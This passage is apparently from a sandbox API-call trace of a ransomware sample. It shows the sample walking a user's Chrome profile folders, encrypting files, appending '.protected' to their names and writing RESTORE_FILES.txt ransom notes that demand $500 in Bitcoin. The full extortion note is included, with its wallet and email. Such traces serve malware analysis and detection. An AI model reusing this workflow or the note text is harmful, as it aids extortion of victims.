(lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.439] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.440] CloseHandle (hObject=0x150) returned 1 [0084.441] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.441] lstrcmpiW (lpString1="EVWhitelist", lpString2="Windows") returned -1 [0084.441] lstrcmpiW (lpString1="EVWhitelist", lpString2="Program Files") returned -1 [0084.441] lstrcmpiW (lpString1="EVWhitelist", lpString2="Program Files (x86)") returned -1 [0084.441] lstrcmpiW (lpString1="EVWhitelist", lpString2="$Recycle.bin") returned 1 [0084.441] lstrcmpiW (lpString1="EVWhitelist", lpString2="System Volume Information") returned -1 [0084.441] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 83 [0084.441] lstrcmpW (lpString1="EVWhitelist", lpString2=".") returned 1 [0084.441] lstrcmpW (lpString1="EVWhitelist", lpString2="..") returned 1 [0084.441] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*") returned 85 [0084.441] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.442] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.442] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.442] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.442] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.442] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.442] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\.") returned 85 [0084.442] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.442] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.442] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.442] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.442] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.442] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.442] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.442] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\..") returned 86 [0084.442] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.442] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.442] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.442] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.443] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\RESTORE_FILES.txt") returned 101 [0084.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.444] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.444] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.445] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.445] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.445] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.445] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.445] CloseHandle (hObject=0x150) returned 1 [0084.445] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.445] lstrcmpiW (lpString1="FileTypePolicies", lpString2="Windows") returned -1 [0084.445] lstrcmpiW (lpString1="FileTypePolicies", lpString2="Program Files") returned -1 [0084.445] lstrcmpiW (lpString1="FileTypePolicies", lpString2="Program Files (x86)") returned -1 [0084.445] lstrcmpiW (lpString1="FileTypePolicies", lpString2="$Recycle.bin") returned 1 [0084.445] lstrcmpiW (lpString1="FileTypePolicies", lpString2="System Volume Information") returned -1 [0084.445] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 88 [0084.445] lstrcmpW (lpString1="FileTypePolicies", lpString2=".") returned 1 [0084.445] lstrcmpW (lpString1="FileTypePolicies", lpString2="..") returned 1 [0084.445] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*") returned 90 [0084.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.445] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.445] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.445] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.445] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.446] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.446] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\.") returned 90 [0084.446] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.446] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.446] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.446] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.446] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.446] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.446] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.446] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\..") returned 91 [0084.446] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.446] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.446] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.446] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.446] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\RESTORE_FILES.txt") returned 106 [0084.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.447] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.447] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.447] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.447] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.447] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.448] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.448] CloseHandle (hObject=0x150) returned 1 [0084.448] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.448] lstrcmpiW (lpString1="First Run", lpString2="Windows") returned -1 [0084.448] lstrcmpiW (lpString1="First Run", lpString2="Program Files") returned -1 [0084.448] lstrcmpiW (lpString1="First Run", lpString2="Program Files (x86)") returned -1 [0084.448] lstrcmpiW (lpString1="First Run", lpString2="$Recycle.bin") returned 1 [0084.448] lstrcmpiW (lpString1="First Run", lpString2="System Volume Information") returned -1 [0084.448] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run") returned 81 [0084.448] StrStrIW (lpFirst="First Run", lpSrch=".protected") returned 0x0 [0084.448] lstrcmpW (lpString1="First Run", lpString2="RESTORE_FILES.txt") returned -1 [0084.448] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.448] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\first run"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.448] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run") returned 81 [0084.448] StrStrW (lpFirst="First Run", lpSrch=".txt") returned 0x0 [0084.448] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run") returned 81 [0084.448] StrStrW (lpFirst="First Run", lpSrch=".rar") returned 0x0 [0084.448] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run") returned 81 [0084.448] StrStrW (lpFirst="First Run", lpSrch=".zip") returned 0x0 [0084.449] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.449] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.449] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.449] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.449] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.450] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.450] CloseHandle (hObject=0x150) returned 1 [0084.450] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run.protected") returned 91 [0084.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\first run"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\first run.protected")) returned 1 [0084.450] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.450] lstrcmpiW (lpString1="Local State", lpString2="Windows") returned -1 [0084.451] lstrcmpiW (lpString1="Local State", lpString2="Program Files") returned -1 [0084.451] lstrcmpiW (lpString1="Local State", lpString2="Program Files (x86)") returned -1 [0084.451] lstrcmpiW (lpString1="Local State", lpString2="$Recycle.bin") returned 1 [0084.451] lstrcmpiW (lpString1="Local State", lpString2="System Volume Information") returned -1 [0084.451] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned 83 [0084.451] StrStrIW (lpFirst="Local State", lpSrch=".protected") returned 0x0 [0084.451] lstrcmpW (lpString1="Local State", lpString2="RESTORE_FILES.txt") returned -1 [0084.451] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.451] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.451] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned 83 [0084.451] StrStrW (lpFirst="Local State", lpSrch=".txt") returned 0x0 [0084.451] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned 83 [0084.451] StrStrW (lpFirst="Local State", lpSrch=".rar") returned 0x0 [0084.451] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned 83 [0084.451] StrStrW (lpFirst="Local State", lpSrch=".zip") returned 0x0 [0084.451] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.471] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.471] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.471] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.471] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.472] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.472] CloseHandle (hObject=0x150) returned 1 [0084.472] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State.protected") returned 93 [0084.472] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state.protected")) returned 1 [0084.473] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.473] lstrcmpiW (lpString1="OriginTrials", lpString2="Windows") returned -1 [0084.473] lstrcmpiW (lpString1="OriginTrials", lpString2="Program Files") returned -1 [0084.473] lstrcmpiW (lpString1="OriginTrials", lpString2="Program Files (x86)") returned -1 [0084.473] lstrcmpiW (lpString1="OriginTrials", lpString2="$Recycle.bin") returned 1 [0084.473] lstrcmpiW (lpString1="OriginTrials", lpString2="System Volume Information") returned -1 [0084.473] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 84 [0084.473] lstrcmpW (lpString1="OriginTrials", lpString2=".") returned 1 [0084.473] lstrcmpW (lpString1="OriginTrials", lpString2="..") returned 1 [0084.473] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\*") returned 86 [0084.473] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.473] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.473] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.473] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.473] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.473] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.473] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\.") returned 86 [0084.473] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.473] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.473] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.473] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.473] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.473] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.473] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.474] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\..") returned 87 [0084.474] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.474] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.474] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.474] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.474] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\RESTORE_FILES.txt") returned 